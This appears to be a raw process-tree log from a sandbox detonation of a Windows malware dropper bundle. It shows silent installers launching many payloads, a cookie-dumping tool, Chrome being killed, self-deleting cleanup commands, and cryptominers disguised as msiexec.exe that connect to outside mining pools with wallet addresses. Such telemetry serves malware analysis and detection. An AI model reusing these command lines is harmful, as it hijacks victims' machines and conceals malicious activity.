"C:\Users\Admin\AppData\Local\Temp\is-FH22R.tmp\IBInstaller_97039.tmp" /SL5="$2035C,14575144,721408,C:\Users\Admin\AppData\Local\Temp\vtyth3ixulc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
1⤵
PID:5596
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CMHE3.tmp\{app}\microsoft.cab -F:* %ProgramData%
  2⤵
  PID:6136
- - C:\Windows\SysWOW64\expand.exe
    expand C:\Users\Admin\AppData\Local\Temp\is-CMHE3.tmp\{app}\microsoft.cab -F:* C:\ProgramData
    3⤵
    PID:3904

C:\Users\Admin\AppData\Local\Temp\is-LJ9C5.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LJ9C5.tmp\Setup3310.tmp" /SL5="$20316,138429,56832,C:\Users\Admin\AppData\Local\Temp\qg2mwtvnvf2\Setup3310.exe" /Verysilent /subid=577
1⤵
PID:5244
- C:\Users\Admin\AppData\Local\Temp\is-BE1A0.tmp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\is-BE1A0.tmp\Setup.exe" /Verysilent
  2⤵
  PID:5324
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
    3⤵
    PID:5272
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4532
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4652
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
    3⤵
    PID:4008
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 948
      4⤵
      Program crash
      PID:3792
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 932
      4⤵
      Program crash
      PID:7844
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1060
      4⤵
      Program crash
      PID:4440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1084
      4⤵
      Program crash
      PID:4184
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1100
      4⤵
      Program crash
      PID:4196
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1124
      4⤵
      Program crash
      PID:408
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1240
      4⤵
      Program crash
      PID:3232
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1532
      4⤵
      Program crash
      PID:8160
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1552
      4⤵
      Program crash
      PID:7584
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1756
      4⤵
      Program crash
      PID:6660
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1720
      4⤵
      Program crash
      PID:4608
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1776
      4⤵
      Program crash
      PID:7796
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 1680
      4⤵
      Program crash
      PID:7660
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
    3⤵
    PID:5952
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
    3⤵
    PID:5180
  - - C:\Users\Admin\AppData\Local\Temp\is-QBNP0.tmp\LabPicV3.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-QBNP0.tmp\LabPicV3.tmp" /SL5="$2027C,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
      4⤵
      PID:6396
    - - C:\Users\Admin\AppData\Local\Temp\is-1J6B8.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-1J6B8.tmp\ppppppfy.exe" /S /UID=lab214
        5⤵
        
        PID:6928
      - C:\Users\Admin\AppData\Local\Temp\04-69a2b-257-21499-3f0dbc5864dfc\Lahypaekuwe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\04-69a2b-257-21499-3f0dbc5864dfc\Lahypaekuwe.exe"
        6⤵
        
        PID:5148
      - C:\Program Files\Mozilla Firefox\COBJTCVVNW\prolab.exe
        
        "C:\Program Files\Mozilla Firefox\COBJTCVVNW\prolab.exe" /VERYSILENT
        6⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\is-1LOFC.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-1LOFC.tmp\prolab.tmp" /SL5="$304D0,575243,216576,C:\Program Files\Mozilla Firefox\COBJTCVVNW\prolab.exe" /VERYSILENT
        7⤵
        
        PID:6648
      - C:\Users\Admin\AppData\Local\Temp\09-3cc89-ef0-166a7-2e62fdb6709e0\ZHaelogicusy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\09-3cc89-ef0-166a7-2e62fdb6709e0\ZHaelogicusy.exe"
        6⤵
        
        PID:5160
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phnvwgw2.djv\md6_6ydj.exe & exit
        7⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\phnvwgw2.djv\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\phnvwgw2.djv\md6_6ydj.exe
        8⤵
        
        PID:5640
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4w4j2lju.zg2\askinstall31.exe & exit
        7⤵
        
        PID:7828
        
        C:\Users\Admin\AppData\Local\Temp\4w4j2lju.zg2\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\4w4j2lju.zg2\askinstall31.exe
        8⤵
        
        PID:7444
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exe & exit
        7⤵
        
        PID:8020
        
        C:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exe
        8⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exe
        9⤵
        
        PID:6664
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vkw4y1of.01z\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:5532
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0mm1cz30.jc0\setup_10.2_mix.exe & exit
        7⤵
        
        PID:6936
        
        C:\Users\Admin\AppData\Local\Temp\0mm1cz30.jc0\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\0mm1cz30.jc0\setup_10.2_mix.exe
        8⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "
        9⤵
        
        PID:6576
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jaly0g0i.sa3\file.exe & exit
        7⤵
        
        PID:5692
        
        C:\Users\Admin\AppData\Local\Temp\jaly0g0i.sa3\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\jaly0g0i.sa3\file.exe
        8⤵
        
        PID:7832
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        9⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:7424
        
        C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe" 1 3.1617513448.60694be86bbec 101
        11⤵
        
        PID:8788
        
        C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe" 2 3.1617513448.60694be86bbec
        12⤵
        
        PID:6116
        
        C:\Users\Admin\AppData\Local\Temp\nlioyj5ct2s\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nlioyj5ct2s\app.exe" /8-23
        13⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\mnmirn5jqyn\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mnmirn5jqyn\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\is-NHMJU.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NHMJU.tmp\vict.tmp" /SL5="$20868,870426,780800,C:\Users\Admin\AppData\Local\Temp\mnmirn5jqyn\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:9176
        
        C:\Users\Admin\AppData\Local\Temp\ciysk1dyruz\hasf2f040p1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ciysk1dyruz\hasf2f040p1.exe" /ustwo INSTALL
        13⤵
        
        PID:9508
        
        C:\Users\Admin\AppData\Local\Temp\50uiequ031h\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\50uiequ031h\cpyrix.exe" /VERYSILENT
        13⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        14⤵
        
        PID:9336
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        14⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Local\Temp\iumpw3jvlej\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iumpw3jvlej\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:9340
        
        C:\Users\Admin\AppData\Local\Temp\VQI9BW7A2H\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VQI9BW7A2H\setups.exe" ll
        10⤵
        
        PID:8624
        
        C:\Users\Admin\AppData\Local\Temp\is-NORCH.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-NORCH.tmp\setups.tmp" /SL5="$505B6,635399,250368,C:\Users\Admin\AppData\Local\Temp\VQI9BW7A2H\setups.exe" ll
        11⤵
        
        PID:8880
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        9⤵
        
        PID:8956
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        10⤵
        
        PID:3236
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        11⤵
        
        PID:8196
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        9⤵
        
        PID:8856
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        9⤵
        
        PID:8824
        
        C:\Users\Admin\AppData\Roaming\6D24.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\6D24.tmp.exe"
        10⤵
        
        PID:8224
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        11⤵
        
        PID:6124
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        11⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Roaming\B4AD.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\B4AD.tmp.exe"
        10⤵
        
        PID:7920
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        10⤵
        
        PID:8608
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        11⤵
        Runs ping.exe
        
        PID:8868
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        9⤵
        
        PID:9192
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0mxzrqx1.uzs\app.exe /8-2222 & exit
        7⤵
        
        PID:8076
        
        C:\Users\Admin\AppData\Local\Temp\0mxzrqx1.uzs\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\0mxzrqx1.uzs\app.exe /8-2222
        8⤵
        
        PID:5672
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kivhkoxp.0me\Four.exe & exit
        7⤵
        
        PID:8088
        
        C:\Users\Admin\AppData\Local\Temp\kivhkoxp.0me\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\kivhkoxp.0me\Four.exe
        8⤵
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        9⤵
        
        PID:7216
        
        C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe" 1 3.1617513548.60694c4c66ef9 104
        10⤵
        
        PID:9732
        
        C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe" 2 3.1617513548.60694c4c66ef9
        11⤵
        
        PID:10604
        
        C:\Users\Admin\AppData\Local\Temp\PO37IIJV5N\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PO37IIJV5N\setups.exe" ll
        9⤵
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\is-FN35R.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FN35R.tmp\setups.tmp" /SL5="$406CE,635399,250368,C:\Users\Admin\AppData\Local\Temp\PO37IIJV5N\setups.exe" ll
        10⤵
        
        PID:6684
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
    3⤵
    PID:6024
  - - C:\Users\Admin\AppData\Local\Temp\is-BSMLF.tmp\lylal220.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-BSMLF.tmp\lylal220.tmp" /SL5="$10522,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
      4⤵
      PID:6404
    - - C:\Users\Admin\AppData\Local\Temp\is-3AUBM.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3AUBM.tmp\Microsoft.exe" /S /UID=lylal220
        5⤵
        
        PID:6964
      - C:\Program Files\Windows Defender Advanced Threat Protection\JPYUBSRYZT\irecord.exe
        
        "C:\Program Files\Windows Defender Advanced Threat Protection\JPYUBSRYZT\irecord.exe" /VERYSILENT
        6⤵
        
        PID:5128
        
        C:\Users\Admin\AppData\Local\Temp\is-IH3B8.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IH3B8.tmp\irecord.tmp" /SL5="$2026A,6265333,408064,C:\Program Files\Windows Defender Advanced Threat Protection\JPYUBSRYZT\irecord.exe" /VERYSILENT
        7⤵
        
        PID:5832
      - C:\Users\Admin\AppData\Local\Temp\44-6b2a4-6ac-d7fbe-415bde322ee10\Kusamodihi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\44-6b2a4-6ac-d7fbe-415bde322ee10\Kusamodihi.exe"
        6⤵
        
        PID:4548
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 2376
        7⤵
        
        PID:5552
      - C:\Users\Admin\AppData\Local\Temp\4c-1d425-e19-636a3-988c798dcf9c7\Haetasheforu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4c-1d425-e19-636a3-988c798dcf9c7\Haetasheforu.exe"
        6⤵
        
        PID:4692
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cyujfrkg.l0f\md6_6ydj.exe & exit
        7⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Local\Temp\cyujfrkg.l0f\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\cyujfrkg.l0f\md6_6ydj.exe
        8⤵
        
        PID:5144
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4zoao1r.d0l\askinstall31.exe & exit
        7⤵
        
        PID:6912
        
        C:\Users\Admin\AppData\Local\Temp\q4zoao1r.d0l\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\q4zoao1r.d0l\askinstall31.exe
        8⤵
        
        PID:7336
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        9⤵
        
        PID:7000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        10⤵
        Kills process with taskkill
        
        PID:3436
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exe & exit
        7⤵
        
        PID:4868
        
        C:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exe
        8⤵
        
        PID:7760
        
        C:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exe
        9⤵
        
        PID:4256
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb1nbw1t.3lk\GcleanerWW.exe /mixone & exit
        7⤵
        
        PID:6856
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrniyazd.hzf\setup_10.2_mix.exe & exit
        7⤵
        
        PID:6556
        
        C:\Users\Admin\AppData\Local\Temp\lrniyazd.hzf\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\lrniyazd.hzf\setup_10.2_mix.exe
        8⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "
        9⤵
        
        PID:2224
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m0zogzjj.vfz\file.exe & exit
        7⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\m0zogzjj.vfz\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\m0zogzjj.vfz\file.exe
        8⤵
        
        PID:6476
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        9⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        10⤵
        
        PID:7104
        
        C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe" 1 3.1617513441.60694be1dc69d 101
        11⤵
        
        PID:7908
        
        C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe" 2 3.1617513441.60694be1dc69d
        12⤵
        
        PID:6304
        
        C:\Users\Admin\AppData\Local\Temp\0of4bu5oef3\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0of4bu5oef3\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:8920
        
        C:\Users\Admin\AppData\Local\Temp\is-5EDN4.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5EDN4.tmp\Setup3310.tmp" /SL5="$605C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\0of4bu5oef3\Setup3310.exe" /Verysilent /subid=577
        14⤵
        
        PID:9432
        
        C:\Users\Admin\AppData\Local\Temp\is-JSFC9.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JSFC9.tmp\Setup.exe" /Verysilent
        15⤵
        
        PID:9172
        
        C:\Users\Admin\AppData\Local\Temp\yvjbbxdwxac\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yvjbbxdwxac\cpyrix.exe" /VERYSILENT
        13⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        14⤵
        
        PID:10124
        
        C:\Users\Admin\AppData\Local\Temp\efae2507-9670-45c6-a92f-9c632fd264e9\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\efae2507-9670-45c6-a92f-9c632fd264e9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\efae2507-9670-45c6-a92f-9c632fd264e9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        15⤵
        
        PID:7164
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        14⤵
        
        PID:9208
        
        C:\Users\Admin\AppData\Local\Temp\l03nd40ftwn\kdzelueegsn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\l03nd40ftwn\kdzelueegsn.exe" /ustwo INSTALL
        13⤵
        
        PID:9444
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "kdzelueegsn.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\l03nd40ftwn\kdzelueegsn.exe" & exit
        14⤵
        
        PID:10412
        
        C:\Users\Admin\AppData\Local\Temp\o1bwsw5ooic\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\o1bwsw5ooic\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:9504
        
        C:\Users\Admin\AppData\Local\Temp\is-90A3G.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-90A3G.tmp\vict.tmp" /SL5="$207EE,870426,780800,C:\Users\Admin\AppData\Local\Temp\o1bwsw5ooic\vict.exe" /VERYSILENT /id=535
        14⤵
        
        PID:9976
        
        C:\Users\Admin\AppData\Local\Temp\is-GU4BC.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-GU4BC.tmp\win1host.exe" 535
        15⤵
        
        PID:9992
        
        C:\Users\Admin\AppData\Local\Temp\u04o4ymgzwp\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u04o4ymgzwp\app.exe" /8-23
        13⤵
        
        PID:7996
        
        C:\Users\Admin\AppData\Local\Temp\7TBAQO2NUF\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7TBAQO2NUF\setups.exe" ll
        10⤵
        
        PID:8244
        
        C:\Users\Admin\AppData\Local\Temp\is-RL651.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-RL651.tmp\setups.tmp" /SL5="$B041A,635399,250368,C:\Users\Admin\AppData\Local\Temp\7TBAQO2NUF\setups.exe" ll
        11⤵
        
        PID:8544
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        9⤵
        
        PID:8472
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        10⤵
        
        PID:3552
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        11⤵
        Kills process with taskkill
        
        PID:7516
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        9⤵
        
        PID:4856
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        10⤵
        
        PID:8988
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        11⤵
        
        PID:8348
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        9⤵
        
        PID:7372
        
        C:\Users\Admin\AppData\Roaming\AB46.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\AB46.tmp.exe"
        10⤵
        
        PID:7264
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        11⤵
        
        PID:3520
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        11⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Roaming\F60B.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\F60B.tmp.exe"
        10⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        10⤵
        
        PID:7072
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        11⤵
        Runs ping.exe
        
        PID:6504
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        9⤵
        
        PID:1684
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sbsqzick.gil\app.exe /8-2222 & exit
        7⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\sbsqzick.gil\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\sbsqzick.gil\app.exe /8-2222
        8⤵
        
        PID:204
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ejojy0rt.iia\Four.exe & exit
        7⤵
        
        PID:8932
        
        C:\Users\Admin\AppData\Local\Temp\ejojy0rt.iia\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\ejojy0rt.iia\Four.exe
        8⤵
        
        PID:8128
        
